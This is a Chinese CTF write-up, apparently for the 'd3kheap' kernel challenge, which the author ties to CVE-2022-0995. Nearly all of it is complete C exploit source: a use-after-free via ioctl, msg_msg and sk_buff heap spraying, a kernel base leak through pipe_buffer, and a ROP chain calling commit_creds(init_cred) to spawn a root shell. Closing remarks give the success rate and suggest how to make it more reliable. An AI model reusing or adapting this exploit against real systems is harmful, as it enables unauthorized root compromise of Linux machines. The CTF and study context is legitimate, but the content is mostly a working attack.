这道题一开始没做出来，后来复现了CVE-2022-0995，发现两道题其实是一样的。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <sys/types.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <stdint.h>
#define SOCKET_NUM 16
#define SK_BUFF_NUM 128void err_exit(char* msg)
{printf("[X] Error at %s\n", msg);exit(-1);
}size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{asm volatile ("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}int initSocketArray(int sk_socket[SOCKET_NUM][2])
{/* socket pairs to spray sk_buff */for (int i = 0; i < SOCKET_NUM; i++){if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0){printf("[x] failed to create no.%d socket pair!\n", i);return -1;}}return 0;
}int spraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{for (int i = 0; i < SOCKET_NUM; i++){for (int j = 0; j < SK_BUFF_NUM; j++){if (write(sk_socket[i][0], buf, size) < 0){printf("[x] failed to spray %d sk_buff for %d socket!", j, i);return -1;}}}return 0;
}int freeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{for (int i = 0; i < SOCKET_NUM; i++){for (int j = 0; j < SK_BUFF_NUM; j++){if (read(sk_socket[i][1], buf, size) < 0){puts("[x] failed to received sk_buff!");return -1;}}}return 0;
}struct list_head {uint64_t    next;uint64_t    prev;
};struct msg_msg {struct list_head m_list;uint64_t    m_type;uint64_t    m_ts;uint64_t    next;uint64_t    security;
};struct msg_msgseg {uint64_t    next;
};/*
struct msgbuf {long mtype;char mtext[0];
};
*/int get_msg_queue(void)
{return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}/*** the msgp should be a pointer to the `struct msgbuf`,* and the data should be stored in msgbuf.mtext*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{((struct msgbuf*)msgp)->mtype = msgtyp;return msgsnd(msqid, msgp, msgsz, 0);
}/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_type, uint64_t m_ts,  uint64_t next, uint64_t security)
{msg->m_list.next = m_list_next;msg->m_list.prev = m_list_prev;msg->m_type = m_type;msg->m_ts = m_ts;msg->next = next;msg->security = security;
}void get_shell(){if(getuid()==0){printf("[+] success!!!\n");system("/bin/sh");}else{printf("[+] something wrong;\n");}
}int fd;
int qu[0x1000];
size_t buf[0x1400];
size_t kbase=0;
size_t page_base=0;
int res=0;
int pipe_fd[0x100][2];void spray_pipe(){printf("start to spary pipe!!!\n");int i=0;for(;i<0x100;i++){pipe(pipe_fd[i]);write(pipe_fd[i][1],"haoqiguai",10);}
}void add(){ioctl(fd,0x1234);
}void del(){ioctl(fd,0xDEAD);
}int socket_buf[SOCKET_NUM][2];
int socket_bb[SOCKET_NUM][2];
size_t sock_buf[1000]={0};
size_t init_cred;
size_t pop_rdi;
size_t commit_creds;
size_t restore;
size_t push_rsi;
size_t add_rsp;
size_t pop_rsp;int main(){bind_core(0);save_status();fd=open("/dev/d3kheap",0);if(fd<0)perror("fd");initSocketArray(socket_buf);initSocketArray(socket_bb);add();del();int i=0;for(;i<0x1000;i++){qu[i]=get_msg_queue();write_msg(qu[i],buf,800,1);}i=0;for(;i<0x1000;i++){buf[5]=i;write_msg(qu[i],buf,800,2);}del();sock_buf[2]=1;sock_buf[3]=0x1000;spraySkBuff(socket_buf,sock_buf,500);size_t leak[500]={0};peek_msg(qu[0],leak,0x1000,0);//i=0;//for(;i<500;i++)printf("%d:%lx;\n",i,leak[i]);printf("[+] UAF object found :%lx;\n",leak[123]);printf("[+] fake_head found :%lx;\n",leak[124]);size_t uaf=leak[123];size_t fake_head=leak[124];freeSkBuff(socket_buf,sock_buf,500);sock_buf[0]=uaf;sock_buf[1]=fake_head;sock_buf[2]=1;sock_buf[3]=800;spraySkBuff(socket_buf,sock_buf,500);printf("[+] start to leak kbase!!!\n");memset(leak,0,4000);peek_msg(qu[0],leak,800,1);//i=0;//for(;i<100;i++)printf("%d:%lx;\n",i,leak[i]);size_t origin=leak[5];printf("[+] UAF object number is %d;\n",origin);res=read_msg(qu[origin],leak,800,2);if(res<0)err_exit("read_msg 1");sock_buf[0]=fake_head;sock_buf[1]=fake_head;sock_buf[2]=2;sock_buf[3]=800;sock_buf[4]=0;sock_buf[5]=0;spraySkBuff(socket_bb,sock_buf,500);printf("[+] free again now!!\n");res=read_msg(qu[0],leak,800,2);if(res<0)err_exit("read_msg 2");spray_pipe();for (int i = 0; i < SOCKET_NUM; i++){for (int j = 0; j < SK_BUFF_NUM; j++){if (read(socket_bb[i][1], sock_buf, 500) < 0){puts("[x] failed to received sk_buff!");return -1;}if(sock_buf[2]>0xffffffff80000000){printf("[+] pipe_buffer ops found %lx !\n",sock_buf[2]);kbase=sock_buf[2]-0x203fe40;}}}printf("kbase:%lx;\n",kbase);printf("[+] start to get root power!!\n");commit_creds=kbase+0x10d25c0;init_cred=kbase+0x2c6d580;pop_rdi=kbase+0x10938f0;push_rsi=kbase+0x1724a8c;pop_rsp=kbase+0x116c880;add_rsp=kbase+0x1076739;restore=kbase+0x1c01006;size_t rop[0x1000]={0};rop[2]=uaf+0x18;rop[1]=0;rop[0]=add_rsp;rop[3]=push_rsi;rop[4]=push_rsi;rop[5]=push_rsi;memcpy((char*)rop+0x39,&pop_rsp,8);rop[27]=pop_rdi;rop[28]=init_cred;rop[29]=commit_creds;rop[30]=restore;rop[31]=0xdeadbeef;rop[32]=0xdeadbeef;rop[33]=(size_t)get_shell;rop[34]=user_cs;rop[35]=user_rflags;rop[36]=user_sp;rop[37]=user_ss;res=spraySkBuff(socket_bb,rop,500);del();i=0;for(;i<0x100;i++){close(pipe_fd[i][0]);close(pipe_fd[i][1]);}return 0;
}

这题还能反复写，其实比CVE更简单，这个exp一次性打成的概率是1/2左右，因为qu[0]的主消息的下一个不一定也是msg_msg，但其实可以预先堆喷一些msg_msg，直接让UAF的object在充满msg_msg的页中即可，不过我懒得这样搞了。